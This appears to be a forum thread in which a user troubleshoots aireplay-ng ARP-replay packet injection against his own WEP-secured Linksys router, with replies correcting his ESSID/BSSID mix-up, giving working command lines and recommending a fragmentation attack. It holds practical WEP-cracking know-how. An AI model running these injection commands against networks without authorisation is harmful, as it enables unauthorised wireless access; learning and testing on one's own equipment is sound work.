Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: Help with aireplay -ng (Packet Injection)

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    12

    Default Help with aireplay -ng (Packet Injection)

    I'm following the instructions from abitaz's blog (awesome so far!). I'm running a linksys router - I set the encryption down to WEP. I've got a second laptop downloading all kinds of stuff and generating lots of traffic.

    I've got airodump-ng monitoring the channel (and it's working correctly). Now, I'm trying to use aireplay-ng to inject packets (I don't understand this very well yet).

    The command abitaz suggets using is: aireplay-ng -3 -e 07B402920894 rausb0

    -3 Is the kind of attack (but I'm not sure what kind of attack that is) and -e (according to the help file) lets me specify the SSID of the target AP.

    So, the BSSID of my target AP is 00:0F:66:00:6A:1D. (As displayed by airodump-ng, however aireplay asks me to enter it without the colons)

    So, when I enter the command, I see the following happen:

    bt ~ # aireplay-ng -3 -e 000F66006A1D rausb0
    No source MAC (-h) specified. Using the device MAC (00:0E:3B:09:C2:A1)
    22:35:14 Waiting for beacon frame (ESSID: 000F66006A1D) on channel 6
    22:35:24 No such BSSID available.
    Please specify a BSSID (-a).
    bt ~ #


    However, this is what I see in airodump:
    00:0F:66:00:6A:1D 101 100 18836 41088 10 6 48 WEP WEP Anarchia

    There are tons of beacons! So, I'm lost. Help? Thanks

  2. #2

    Default

    Hi. -e is for the ESSID, or the name of the network, not the BSSID, which is the MAC address of the AP

  3. #3
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    12

    Default

    Quote Originally Posted by abitaz View Post
    Hi. -e is for the ESSID, or the name of the network, not the BSSID, which is the MAC address of the AP
    Ah-HAH! That was my mistake. In your blog, your target AP's ESSID is also it's BSSID. I got confused with the terminology. Thanks!

    Quote Originally Posted by abitaz View Post
    BTW, the main point of injection is if there isn't lots of traffic, or even no traffic at all. If you are trying to test it, try without generating any traffic. That's the cool thing about aireplay injection.
    Gotcha. I will try that tonight.

    Quote Originally Posted by spankdidly View Post
    Man, use the fragmentation attack. It works every time for me. I dont care about clients or lack of clients or anything on my AP. I just hose it down with fragmentation!
    Awesome. As soon as I'm done learning about this type of attack (No idea what it's even called) I'll try out a fragmentation attack (hopefully tonight!) Thanks!

  4. #4
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Quote Originally Posted by F4RR4R View Post
    Ah-HAH! That was my mistake. In your blog, your target AP's ESSID is also it's BSSID. I got confused with the terminology. Thanks!



    Gotcha. I will try that tonight.



    Awesome. As soon as I'm done learning about this type of attack (No idea what it's even called) I'll try out a fragmentation attack (hopefully tonight!) Thanks!
    Edit your posts, do not make three posts in a row in two minutes.

  5. #5

    Default

    Ah-HAH! That was my mistake. In your blog, your target AP's ESSID is also it's BSSID. I got confused with the terminology. Thanks!

    Actually, it's not it's BSSID although the ESSID name sounds almost like a BSSID. A BSSID will always be represented with colons, xx:xx:xx:xx:xx:xx, and will have 12 digits.

    No This Attack is for Routers with no clients. It requires a few more settings, but it's great.
    If so, I'll play with it a bit and if I'm successful, I will post a step-by-step on my blog. Thanks.

  6. #6

    Default

    BTW, the main point of injection is if there isn't lots of traffic, or even no traffic at all. If you are trying to test it, try without generating any traffic. That's the cool thing about aireplay injection.

    Quote Originally Posted by F4RR4R View Post
    I've got a second laptop downloading all kinds of stuff and generating lots of traffic.

  7. #7
    Junior Member thegreo's Avatar
    Join Date
    Jan 2008
    Posts
    61

    Default

    when runiing aireplay try the following

    aireplay-ng -3 -b BSSID-OF-AP -h YOUR_DEVICE_MAC rausb0

    so the attack is -3
    -b is th BSSID of you AP (Typed in lik a MAC ADDRESS! (NOT THE BROADCAST NAME I.e LINKSYS (ESSID))

    -h is your DEVICE MAC! (not sure if you are spoofing it or not)

    so the command would look like

    aireplay-ng -3 -b 1f:2f:3f:4f:5f:6f -h 00:11:22:33:44:55:66 rausb0



    ---------------------------------------------------------------

    I assume you are associate with the Access point before you try this command..........(as you said so far so good)
    If you are not or unsure what i mean, please dont side track from your original question... thanks
    Give credit & show appreciation for members creations,

  8. #8

    Default

    As I mentioned on my blog, to keep the commands at the simplest level, in most cases you can leave out the -h parameter, and it will use your MAC address by default. You also have a choice of using one of either the BSSID or the ESSID.

    Quote Originally Posted by thegreo View Post
    when runiing aireplay try the following

    aireplay-ng -3 -b BSSID-OF-AP -h YOUR_DEVICE_MAC rausb0

    so the attack is -3
    -b is th BSSID of you AP (Typed in lik a MAC ADDRESS! (NOT THE BROADCAST NAME I.e LINKSYS (ESSID))

    -h is your DEVICE MAC! (not sure if you are spoofing it or not)

    so the command would look like

    aireplay-ng -3 -b 1f:2f:3f:4f:5f:6f -h 00:11:22:33:44:55:66 rausb0



    ---------------------------------------------------------------

    I assume you are associate with the Access point before you try this command..........(as you said so far so good)
    If you are not or unsure what i mean, please dont side track from your original question... thanks

  9. #9
    Junior Member thegreo's Avatar
    Join Date
    Jan 2008
    Posts
    61

    Default

    i didnt mean to trod on your shoes with my post fella

    I perfectly agree with you, and to be honest there is no right or wrong way, if it works, you have suceeded, but i do agree with you keeping things simple, short & sweet, it will speed up your process and make learning easier.

    Sorry again fella

  10. #10
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Man, use the fragmentation attack. It works every time for me. I dont care about clients or lack of clients or anything on my AP. I just hose it down with fragmentation!
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •